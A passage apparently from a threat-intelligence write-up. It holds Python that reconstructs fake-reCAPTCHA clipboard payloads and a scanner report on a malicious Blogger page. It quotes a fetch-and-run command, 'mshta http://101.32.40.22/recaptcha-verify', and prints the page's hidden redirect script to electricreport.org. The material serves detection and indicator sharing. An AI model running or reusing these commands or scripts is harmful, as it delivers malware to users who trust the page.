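        if name in ("window.location.origin", "location.origin"):
            return origin
        if name not in decls or name in stack:
            return "{%s}" % name
        return "".join(tok if kind == "str" else value(tok, stack + (name,))
                       for kind, tok in decls[name] if kind != "op")

    return {name: value(name) for name in decls}

def analyze(html, origin):
    """Report the staged command, the URL the victim's machine would fetch, and the decoy text."""
    js = "\n".join(re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.S | re.I))
    report = {"clipboard_write": bool(CLIPBOARD_WRITE.search(js)), "payload": None,
              "verb": None, "fetch_url": None, "decoy": None}
    # The final clipboard text is a superstring of its parts: take the longest LOLBin-led value.
    staged = [v for v in resolve_strings(js, origin).values()
              if (m := re.match(r"\s*([A-Za-z]+)(?:\.exe)?\s", v)) and m.group(1).lower() in LOLBINS]
    if not staged:
        return report
    payload = report["payload"] = max(staged, key=len)
    report["verb"] = payload.split()[0].lower()
    url = re.search(r"https?://\S+", payload)
    if url:
        p = urlsplit(url.group(0))
        # After the ' # ' separator the text is a PowerShell comment or a URL fragment,
        # so only the URL before it ever reaches the attacker's server.
        report["fetch_url"] = urlunsplit((p.scheme, p.netloc, p.path, p.query, ""))
    if " # " in payload:
        report["decoy"] = payload.split(" # ", 1)[1]
    return report
```

`analyze(SAMPLE_HTML, "http://101.32.40.22")` reconstructs the pasted line as `mshta http://101.32.40.22/recaptcha-verify # ✅ ''I am not a robot - reCAPTCHA Verification ID: {verification_id}''`. The decoy is placed after ` # ` so that the visible tail of the Run dialog reads like a verification string, while `#` starts a comment in PowerShell and a fragment in a URL; the server therefore only ever sees a request for `/recaptcha-verify`, which is the path to look for in proxy logs alongside `mshta.exe` launches that carry a URL argument.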
https://staplebrokenmetaliyro.blogspot.com/
Total findings: 46
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
{ "URL": "https://staplebrokenmetaliyro.blogspot.com/", "URLs": [ "http://www.w3.org/1999/xhtml", "http://www.google.com/2005/gml/b", "http://www.google.com/2005/gml/data", "http://www.google.com/2005/gml/expr", "https://electricreport.org/ygd4g", "https://staplebrokenmetaliyro.blogspot.com/favicon.ico", "https://staplebrokenmetaliyro.blogspot.com/", "https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default", "https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss", "https://www.blogger.com/feeds/3967763303726818370/posts/default", "https://www.blogger.com/profile/02686294779557843862", "https://staplebrokenmetaliyro.blogspot.com/", "https://www.blogblog.com/indie/mspin_black_large.svg", "https://www.blogblog.com/indie/mspin_white_large.svg", "https://themes.googleusercontent.com/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw", "http://www.offset.com/photos/394244", "https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js", "http://www.w3.org/1999/xlink", "http://www.w3.org/1999/xlink", "https://staplebrokenmetaliyro.blogspot.com/search", "https://www.blogger.com", "http://www.w3.org/1999/xlink", "http://www.offset.com/photos/394244", "http://www.w3.org/1999/xlink", "https://www.blogger.com/profile/02686294779557843862", "http://www.w3.org/1999/xlink", "https://www.blogger.com/profile/02686294779557843862", "https://www.blogger.com/profile/02686294779557843862", "https://www.blogger.com/go/report-abuse", "https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js", "https://www.blogger.com/static/v1/widgets/1991725782-widgets.js", "https://staplebrokenmetaliyro.blogspot.com/", "https://staplebrokenmetaliyro.blogspot.com/", "https://staplebrokenmetaliyro.blogspot.com/", "https://staplebrokenmetaliyro.blogspot.com/search", "https://staplebrokenmetaliyro.blogspot.com/", "https://staplebrokenmetaliyro.blogspot.com/favicon.ico", "https://www.blogger.com", 
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22", "https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22", "https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22", "https://www.blogger.com/profile/02686294779557843862\\x22", "https://apis.google.com/js/platform.js", "https://staplebrokenmetaliyro.blogspot.com/", "https://www.blogger.com/static/v1/jsbin/349593359-lbx.js", "https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css" ], "SuspiciousKeywords": [ "<script>", "\\x3d", "\\x3c", "\\x22", "\\x3e", "\\x27", "display:none" ], "ClipboardManipulation": "...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...", "CaptchaElements": [ "ch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeF", "Header1', 'header', document.getElementById('Header1'), {}, 'displayModeF", "log1', 'page_body', document.getElementById('Blog1'), {'cmtInteractions", "sts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeF", "bution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeF", "e1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeF", ", 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeF", "5/gml/expr'> <head> <script> let linkNam", "dio:not([controls]){display:none;height:0}[hidden],t", "0}[hidden],template{display:none}a{background:transp", "eak-word } .hidden{ display:none } .invisible{ visib", "} input::-ms-clear{ display:none } .blogger-logo,.sv", "mobile_video_class{ display:none } .bg-photo{ backgr", ".show-more.hidden{ display:none } .inline-ad{ displ", ":none } .inline-ad{ display:none; max-width:100%; ov", "} } .item-control{ display:none } #comments{ border", "read .thread-count{ display:none } #comments .commen", "] p.comment-footer{ display:none } #comment-editor-s", "comment-editor-src{ 
display:none } .comments .commen", "ed-top-placeholder{ display:none } .collapsed-header", "eader .replaced h1{ display:none } .centered-top-con", "ader-image-wrapper{ display:none } .centered-top-con", "ible>:not(summary){ display:none } .collapsible[open", "kit-details-marker{ display:none } .collapsible-titl", "itle .chevron-down{ display:none } .flat-button{ cur", "ow-popup li.hidden{ display:none } .pill-button{ bac", "x:101 } .search h3{ display:none } .search form{ dis", "x } .search form>*{ display:none } .search.focused f", "search-input label{ display:none } .centered-top-pla", "search-expand-text{ display:none } .search-close{ di", "ng .sharing-button{ display:none } .widget.Sharing .", "ng-buttons li span{ display:none } .post-share-butto", "are-buttons.hidden{ display:none } .sharing-button{", "tainer .navigation{ display:none } } .dialog{ box-sh", ".FollowByEmail h3{ display:none } .subscribe-popup", ".bg-photo-overlay{ display:none } body#layout .page", "layout .navigation{ display:none } body#layout .side", "ody#layout .search{ display:none } .centered-top-con", "ff; cursor:pointer; display:none; height:48px; margi", ".sticky .Header p{ display:none } .sticky .PageList", ".sticky .PageList{ display:none } .search-focused>*", "t-holder .continue{ display:none } #comment-editor{", ".widget.Profile h2{ display:none } .widget.Profile h", ".sidebar_top:empty{ display:none } .sidebar-containe", "p_wrapper.no-items{ display:none } } .post-snippet.s", "l-ad-container ins{ display:none } .page_body.has-ve", "} .hamburger-menu{ display:none } body.collapsed-he" ], "HTML": "<!DOCTYPE html>\n<html dir='ltr' lang='en' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>\n<head>\n<script>\n let linkName = \"https://electricreport.org/ygd4g\"\n let strGET = window.location.search.replace( '?', '');\n location.replace(linkName + \"?\" + 
strGET)\n </script>\n<meta content='width=device-width, initial-scale=1' name='viewport'/>\n<title>staplebrokenmetal</title>\n<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>\n<!-- Chrome, Firefox OS and Opera -->\n<meta content='#eeeeee' name='theme-color'/>\n<!-- Windows Phone -->\n<meta content='#eeeeee' name='msapplication-navbutton-color'/>\n<meta content='blogger' name='generator'/>\n<link href='https://staplebrokenmetaliyro.blogspot.com/favicon.ico' rel='icon' type='image/x-icon'/>\n<link href='https://staplebrokenmetaliyro.blogspot.com/' rel='canonical'/>\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"staplebrokenmetal - Atom\" href=\"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\" />\n<link rel=\"alternate\" type=\"application/rss+xml\" title=\"staplebrokenmetal - RSS\" href=\"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss\" />\n<link rel=\"service.post\" type=\"application/atom+xml\" title=\"staplebrokenmetal - Atom\" href=\"https://www.blogger.com/feeds/3967763303726818370/posts/default\" />\n<link rel=\"me\" href=\"https://www.blogger.com/profile/02686294779557843862\" />\n<!--Can't find substitution for tag [blog.ieCssRetrofitLinks]-->\n<meta content='https://staplebrokenmetaliyro.blogspot.com/' property='og:url'/>\n<meta content='staplebrokenmetal' property='og:title'/>\n<meta content='' property='og:description'/>\n<style 
type='text/css'>@font-face{font-family:'Damion';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/damion/v15/hv-XlzJ3KEUe_YZkZGw2ATE.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Damion';font-style:normal;font-weight:400;font-display:swap;src:url(//fonts.gstatic.com/s/damion/v15/hv-XlzJ3KEUe_YZkamw2.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDTbtPY_Q.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDYbtPY_Q.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Playfair Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDZbtPY_Q.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Playfair 
Display';font-style:normal;font-weight:900;font-display:swap;src:url(//fonts.gstatic.com/s/playfairdisplay/v37/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsunDXbtM.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAX-k2Qn.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C8A,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAz-k2Qn.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAT-k2Qn.woff2)format('woff2');unicode-range:U+1F00-1FFF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAv-k2Qn.woff2)format('woff2');unicode-range:U+0370-0377,U+037A-037F,U+0384-038A,U+038C,U+038E-03A1,U+03A3-03FF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuHT-k2Qn.woff2)format('woff2');unicode-range:U+0302-0303,U+0305,U+0307-0308,U+0310,U+0312,U+0315,U+031A,U+0326-0327,U+032C,U+032F-0330,U+0332-0333,U+0338,U+033A,U+0346,U+034D,U+0391-03A1,U+03A3-03A9,U+03B1-03C9,U+03D1,U+03D5-03D6,U+03F0-03F1,U+03F4-03F5,U+2016-2017,U+2034-2038,U+203C,U+2040,
U+2043,U+2047,U+2050,U+2057,U+205F,U+2070-2071,U+2074-208E,U+2090-209C,U+20D0-20DC,U+20E1,U+20E5-20EF,U+2100-2112,U+2114-2115,U+2117-2121,U+2123-214F,U+2190,U+2192,U+2194-21AE,U+21B0-21E5,U+21F1-21F2,U+21F4-2211,U+2213-2214,U+2216-22FF,U+2308-230B,U+2310,U+2319,U+231C-2321,U+2336-237A,U+237C,U+2395,U+239B-23B7,U+23D0,U+23DC-23E1,U+2474-2475,U+25AF,U+25B3,U+25B7,U+25BD,U+25C1,U+25CA,U+25CC,U+25FB,U+266D-266F,U+27C0-27FF,U+2900-2AFF,U+2B0E-2B11,U+2B30-2B4C,U+2BFE,U+3030,U+FF5B,U+FF5D,U+1D400-1D7FF,U+1EE00-1EEFF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuGb-k2Qn.woff2)format('woff2');unicode-range:U+0001-000C,U+000E-001F,U+007F-009F,U+20DD-20E0,U+20E2-20E4,U+2150-218F,U+2190,U+2192,U+2194-2199,U+21AF,U+21E6-21F0,U+21F3,U+2218-2219,U+2299,U+22C4-22C6,U+2300-243F,U+2440-244A,U+2460-24FF,U+25A0-27BF,U+2800-28FF,U+2921-2922,U+2981,U+29BF,U+29EB,U+2B00-2BFF,U+4DC0-4DFF,U+FFF9-FFFB,U+10140-1018E,U+10190-1019C,U+101A0,U+101D0-101FD,U+102E0-102FB,U+10E60-10E7E,U+1D2C0-1D2D3,U+1D2E0-1D37F,U+1F000-1F0FF,U+1F100-1F1AD,U+1F1E6-1F1FF,U+1F30D-1F30F,U+1F315,U+1F31C,U+1F31E,U+1F320-1F32C,U+1F336,U+1F378,U+1F37D,U+1F382,U+1F393-1F39F,U+1F3A7-1F3A8,U+1F3AC-1F3AF,U+1F3C2,U+1F3C4-1F3C6,U+1F3CA-1F3CE,U+1F3D4-1F3E0,U+1F3ED,U+1F3F1-1F3F3,U+1F3F5-1F3F7,U+1F408,U+1F415,U+1F41F,U+1F426,U+1F43F,U+1F441-1F442,U+1F444,U+1F446-1F449,U+1F44C-1F44E,U+1F453,U+1F46A,U+1F47D,U+1F4A3,U+1F4B0,U+1F4B3,U+1F4B9,U+1F4BB,U+1F4BF,U+1F4C8-1F4CB,U+1F4D6,U+1F4DA,U+1F4DF,U+1F4E3-1F4E6,U+1F4EA-1F4ED,U+1F4F7,U+1F4F9-1F4FB,U+1F4FD-1F4FE,U+1F503,U+1F507-1F50B,U+1F50D,U+1F512-1F513,U+1F53E-1F54A,U+1F54F-1F5FA,U+1F610,U+1F650-1F67F,U+1F687,U+1F68D,U+1F691,U+1F694,U+1F698,U+1F6AD,U+1F6B2,U+1F6B9-1F6BA,U+1F6BC,U+1F6C6-1F6CF,U+1F6D3-1F6D7,U+1F6E0-1F6EA,U+1F6F0-1F6F3,U+1F6F7-1F6FC,U+1F700-1F7FF,U+1F800-1F80B,U+1F810-1F847,U+1F850-1F859,U+1F860-1F887,U+1F890-1F8AD,U+1F8B0-1F
8BB,U+1F8C0-1F8C1,U+1F900-1F90B,U+1F93B,U+1F946,U+1F984,U+1F996,U+1F9E9,U+1FA00-1FA6F,U+1FA70-1FA7C,U+1FA80-1FA89,U+1FA8F-1FAC6,U+1FACE-1FADC,U+1FADF-1FAE9,U+1FAF0-1FAF8,U+1FB00-1FBFF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAf-k2Qn.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAb-k2Qn.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Roboto';font-style:italic;font-weight:300;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFOKCnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmOClHrs6ljXfMMLt_QuAj-kw.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C8A,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Roboto';font-style:normal;font-weight:
400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)format('woff2');unicode-range:U+1F00-1FFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)format('woff2');unicode-range:U+0370-0377,U+037A-037F,U+0384-038A,U+038C,U+038E-03A1,U+03A3-03FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)format('woff2');unicode-range:U+0302-0303,U+0305,U+0307-0308,U+0310,U+0312,U+0315,U+031A,U+0326-0327,U+032C,U+032F-0330,U+0332-0333,U+0338,U+033A,U+0346,U+034D,U+0391-03A1,U+03A3-03A9,U+03B1-03C9,U+03D1,U+03D5-03D6,U+03F0-03F1,U+03F4-03F5,U+2016-2017,U+2034-2038,U+203C,U+2040,U+2043,U+2047,U+2050,U+2057,U+205F,U+2070-2071,U+2074-208E,U+2090-209C,U+20D0-20DC,U+20E1,U+20E5-20EF,U+2100-2112,U+2114-2115,U+2117-2121,U+2123-214F,U+2190,U+2192,U+2194-21AE,U+21B0-21E5,U+21F1-21F2,U+21F4-2211,U+2213-2214,U+2216-22FF,U+2308-230B,U+2310,U+2319,U+231C-2321,U+2336-237A,U+237C,U+2395,U+239B-23B7,U+23D0,U+23DC-23E1,U+2474-2475,U+25AF,U+25B3,U+25B7,U+25BD,U+25C1,U+25CA,U+25CC,U+25FB,U+266D-266F,U+27C0-27FF,U+2900-2AFF,U+2B0E-2B11,U+2B30-2B4C,U+2BFE,U+3030,U+FF5B,U+FF5D,U+1D400-1D7FF,U+1EE00-1EEFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)format('woff2');unicode-range:U+0001-000C,U+000E-001F,U+007F-009F,U+20DD-20E0,U+20E2-20E4,U+2150-218F,U+2190,U+2192,U+2194-2199,U+21AF,U+21E6-21F0,U+21F3,U+2218-2219,U+2299,U+22C4-22C6,U+2300-243F,U+2440-244A,U+2460-24FF,U+25A0-27BF,U+2800-28FF,U+2921-2922,U+2981,U+29BF,U+29EB,U+2B00-2BFF,U+4DC0-4DFF,U+FFF9-FFFB,U+10140-1018E,U+10190-1019C,U+101A0,U+101D0-101FD,U+10
2E0-102FB,U+10E60-10E7E,U+1D2C0-1D2D3,U+1D2E0-1D37F,U+1F000-1F0FF,U+1F100-1F1AD,U+1F1E6-1F1FF,U+1F30D-1F30F,U+1F315,U+1F31C,U+1F31E,U+1F320-1F32C,U+1F336,U+1F378,U+1F37D,U+1F382,U+1F393-1F39F,U+1F3A7-1F3A8,U+1F3AC-1F3AF,U+1F3C2,U+1F3C4-1F3C6,U+1F3CA-1F3CE,U+1F3D4-1F3E0,U+1F3ED,U+1F3F1-1F3F3,U+1F3F5-1F3F7,U+1F408,U+1F415,U+1F41F,U+1F426,U+1F43F,U+1F441-1F442,U+1F444,U+1F446-1F449,U+1F44C-1F44E,U+1F453,U+1F46A,U+1F47D,U+1F4A3,U+1F4B0,U+1F4B3,U+1F4B9,U+1F4BB,U+1F4BF,U+1F4C8-1F4CB,U+1F4D6,U+1F4DA,U+1F4DF,U+1F4E3-1F4E6,U+1F4EA-1F4ED,U+1F4F7,U+1F4F9-1F4FB,U+1F4FD-1F4FE,U+1F503,U+1F507-1F50B,U+1F50D,U+1F512-1F513,U+1F53E-1F54A,U+1F54F-1F5FA,U+1F610,U+1F650-1F67F,U+1F687,U+1F68D,U+1F691,U+1F694,U+1F698,U+1F6AD,U+1F6B2,U+1F6B9-1F6BA,U+1F6BC,U+1F6C6-1F6CF,U+1F6D3-1F6D7,U+1F6E0-1F6EA,U+1F6F0-1F6F3,U+1F6F7-1F6FC,U+1F700-1F7FF,U+1F800-1F80B,U+1F810-1F847,U+1F850-1F859,U+1F860-1F887,U+1F890-1F8AD,U+1F8B0-1F8BB,U+1F8C0-1F8C1,U+1F900-1F90B,U+1F93B,U+1F946,U+1F984,U+1F996,U+1F9E9,U+1FA00-1FA6F,U+1FA70-1FA7C,U+1FA80-1FA89,U+1FA8F-1FAC6,U+1FACE-1FADC,U+1FADF-1FAE9,U+1FAF0-1FAF8,U+1FB00-1FBFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)format('woff2');unicode-range:U+0100-02BA,U+02BD-02C5,U+02C7-02CC,U+02CE-02D7,U+02DD-02FF,U+0304,U+0308,U+0329,U+1D00-1DBF,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7
CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C8A,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)format('woff2');unicode-range:U+0301,U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)format('woff2');unicode-range:U+1F00-1FFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)format('woff2');unicode-range:U+0370-0377,U+037A-037F,U+0384-038A,U+038C,U+038E-03A1,U+03A3-03FF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)format('woff2');unicode-range:U+0302-0303,U+0305,U+0307-0308,U+0310,U+0312,U+0315,U+031A,U+0326-0327,U+032C,U+032F-0330,U+0332-0333,U+0338,U+033A,U+0346,U+034D,U+0391-03A1,U+03A3-03A9,U+03B1-03C9,U+03D1,U+03D5-03D6,U+03F0-03F1,U+03F4-03F5,U+2016-2017,U+2034-2038,U+203C,U+2040,U+2043,U+2047,U+2050,U+2057,U+205F,U+2070-2071,U+2074-208E,U+2090-209C,U+20D0-20DC,U+20E1,U+20E5-20EF,U+2100-2112,U+2114-2115,U+2117-2121,U+2123-214F,U+2190,U+2192,U+2194-21AE,U+21B0-21E5,U+21F1-21F2,U+21F4-2211,U+2213-2214,U+22
16-22FF,U+2308-230B,U+2310,U+2319,U+231C-2321,U+2336-237A,U+237C,U+2395,U+239B-23B7,U+23D0,U+23DC-23E1,U+2474-2475,U+25AF,U+25B3,U+25B7,U+25BD,U+25C1,U+25CA,U+25CC,U+25FB,U+266D-266F,U+27C0-27FF,U+2900-2AFF,U+2B0E-2B11,U+2B30-2B4C,U+2BFE,U+3030,U+FF5B,U+FF5D,U+1D400-1D7FF,U+1EE00-1EEFF;}@font-face{font-family:'Roboto';font-style:normal;font-weight:700;font-stretch:100%;font-display:swap;src:url(//fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)format('woff2');unicode-range:U+0001-000C,U+000E-001F,U+007F-009F,U+20DD-20E0,U+20E2-20E4,U+2150-218F,U+2190,U+2192,U+2194-2199,U+21AF,U+21E6-21F0,U+21F3,U+2218-2219,U+2299,U+22C4-22C6,U+2300-243F,U+2440-244A,U+2460-24FF,U+25A0-27BF,U+2800-28FF,U+2921-2922,U+2981,U+29BF,U+29EB,U+2B00-2BFF,U+4DC0-4DFF,U+FFF9-FFFB,U+10140-1018E,U+10190-1019C,U+101A0,U+101D0-101FD,U+102E0-102FB,U+10E60-10E7E,U+1D2C0-1D2D3,U+1D2E0-1D37F,U+1F000-1F0FF,U+1F100-1F1AD,U+1F1E6-1F1FF,U+1F30D-1F30F,U+1F315,U+1F31C,U+1F31E,U+1F320-1F32C,U+1F336,U+1F378,U+1F37D,U+1F382,U+1F393-1F39F,U+1F3A7-1F3A8,U+1F3AC-1F3AF,U+1F3C2,U+1F3C4-1F3C6,U+1F3CA-1F3CE,U+1F3D4-1F3E0,U+1F3ED,U+1F3F1-1F3F3,U+1F3F5-1F3F7,U+1F408,U+1F415,U+1F41F,U+1F426,U+1F43F,U+1F441-1F442,U+1F444,U+1F446-1F449,